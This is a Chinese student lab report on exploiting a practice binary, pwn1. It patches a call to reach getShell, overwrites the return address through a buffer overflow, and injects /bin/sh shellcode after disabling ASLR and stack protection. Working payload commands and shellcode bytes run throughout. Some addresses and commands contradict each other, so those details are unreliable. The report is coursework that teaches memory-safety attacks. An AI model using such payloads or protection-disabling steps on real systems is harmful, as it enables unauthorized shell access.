实验目的：

• 本次实践的对象是一个名为pwn1的linux可执行文件。

• 该程序正常执行流程是：main调用foo函数,foo函数会简单回显任何用户输入的字符串。

• 该程序同时包含另一个代码片段，getShell，会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段，然后学习如何注入运行任何Shellcode。

实验要求：

• 手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。
• 利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。
• 注入一个自己制作的shellcode并运行这段shellcode。

基础知识：

• NOP：NOP指令即“空指令”。执行到NOP指令时，CPU什么也不做，仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。（机器码：90）
• JNE：条件转移指令，如果不相等则跳转。（机器码：75）
• JE：条件转移指令，如果相等则跳转。（机器码：74）
• JMP：无条件转移指令。段内直接短转Jmp short（机器码：EB）段内直接近转移Jmp near（机器码：E9）段内间接转移Jmp word（机器码：FF）段间直接(远)转移Jmp far（机器码：EA）
• CMP：比较指令，功能相当于减法指令，只是对操作数之间运算比较，不保存结果。cmp指令执行后，将对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果。

实验步骤：

（一）直接修改程序机器指令，改变程序执行流程

• 知识要求：Call指令，EIP寄存器,指令跳转的偏移计算，补码，反汇编指令objdump，十六进制编辑工具
• 学习目标：理解可执行文件与机器指令

• 进阶：掌握ELF文件格式，掌握动态技术使用

objdump -d pwn1

将pwn1反汇编，得到以下代码（只展示部分核心代码）：

• 从反汇编的文件来看，main函数中调用foo函数，使用call指令。通过分析发现foo函数与getShell函数的首地址之间

存在偏移，两者之间相差了14。系统调用foo函数对应机器指令为e8 d7ffffff,由于电脑为小端机器则通过计算可得知将其指令为c3 ffffff即可，即：

0x08048491 - 0x0804847d = 0x00000014  //计算地址差

0xffffffd7 - 0x00000014 = 0xffffffc3  //计算要篡改的目标地址

修改步骤具体过程如下：

• 用vi打开pwn1，输入:%!xxd将显示模式切换为十六进制
• 在底行模式输入/d7定位需要修改的地方，并确认
• 进入插入模式，修改d7为c3
• 输入:%!xxd -r将十六进制转换为原格式
• 使用:wq保存并退出
  反汇编查看修改后的代码，发现call指令正确调用getShell：
• 这时如果再次objdump -d pwn1你能看到pwn1文件已经改了：

执行./pwn1文件可以成功获取shell：

至此第一个实验完成。

（二）通过构造输入参数，造成BOF攻击，改变程序执行流

• 知识要求：堆栈结构，返回地址
• 学习目标：理解攻击缓冲区的结果，掌握返回地址的获取
• 进阶：掌握ELF文件格式，掌握动态技术
  思路
• 利用缓存区溢出进行攻击，是利用输入的数据将返回值进行覆盖。如果用getShell函数的地址进行覆盖，就会使程序调用getShell函数实现BOF攻击。
• 调用函数的时候，就会将函数的地址作为返回值压栈，即放入栈顶。字符串字节数足够大的时候就能覆盖返回值。理清思路，使用gdb进行调试，弄清楚是哪几个字节会覆盖返回地址。

操作步骤具体如下：

• 使用gdb命令，file pwn1载入pwn1文件。

  输入r执行pwn1，这时程序正常执行，在foo子函数调用的过程中，需要我们输入一个字符串（在你输入完毕以后foo会自动输出这个字符串）。

  输入36个字符后回车：abcdefghijklmnopqrstuvwxyz1234567890

• 这时候已经发生段错误：Segmentation fault，可以看见图中：0x30393837 in ?? ()，也就是说系统无法识别跳转的地址0x30393837。

  本次实验用的是小端机器，30、39、38、37分别是0、9、8、7对应的ASCII码，则表明最后4位刚好完成溢出，覆盖掉返回地址了。

  那只需要把最后四位写为\xd7\x84\x04\x08（shellcode的起始地址0x080484d7）就可以了。

• 使用：perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input

  Perl -e:用于在命令行而不是在脚本中执行 Perl 命令；“|”管道：将第一条命令的结果作为第二条命令的参数来使用；

  可以使用xxd input查看input文件的内容。

  攻击成功以后：

至此第二个实验完成。

（三）注入Shellcode并执行

• shellcode就是一段机器指令（code）
• 通常这段机器指令的目的是为获取一个交互式的shell（像linux的shell或类似windows下的cmd.exe），所以这段机器指令被称为shellcode。
• 在实际的应用中，凡是用来注入的机器指令段都通称为shellcode，像添加一个用户、运行一条指令。
  首先使用apt-get install execstack命令安装execstack。

具体实验步骤如下：

• 修改设置：

• apt-get install execstack //安装execstack命令
  
  execstack -s pwn1 //设置堆栈可执行
  
  execstack -q pwn1 //查询文件的堆栈是否可执行
  
  more /proc/sys/kernel/randomize_va_space //查询是否关闭地址随机化
  
  echo "" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
  
  more /proc/sys/kernel/randomize_va_space //查询是否关闭地址随机化

• 构建构造要注入的payload
• 使用命令：

• perl -e 'print "A" x 32;print "\x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode

  注入，其中前面32个A用来填满缓冲区buf，\x04\x03\x02\x01为预留的返回地址retaddr。

• 然后在该窗口运行(cat input_shellcode;cat) | ./pwn1；
• 然后在另一个窗口运行ps -ef | grep pwn，能看见当前运行pwn1的进程号；
• 在gdb里面attach 进程号（5802）进行调试如图：

• (gdb) disassemble foo，反汇编
• 用break *0x080484ae命令设置断点，输入c命令继续运行，同时之前的正在运行的终端敲回车，使其继续执行。再返回调试终端，使用info r esp命令查找地址。用x/16x 0xffffd2ec命令查看其存放内容，看到了0x01020304，就是返回地址的位置。根据我们构造的input_shellcode可知，shellcode就在其后，所以地址应为0xffffd2fc
• 接下来只需要将之前的\x4\x3\x2\x1改为这个地址即可，用命令
• perl -e 'print "A" x 32;print "\x00\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode

• 最后执行程序：

• (cat input_shellcode;cat) | ./pwn1

至此实验全部完成。

补充：

我对漏洞的看法：在我看来，漏洞是在设计过程中就存在的一些物理上的或逻辑上的缺陷，并且这些缺陷可以被不法攻击者利用，给人们带来损失。漏洞危害极大，会破环系统泄露隐私，给被破坏者带来难以承受的损失。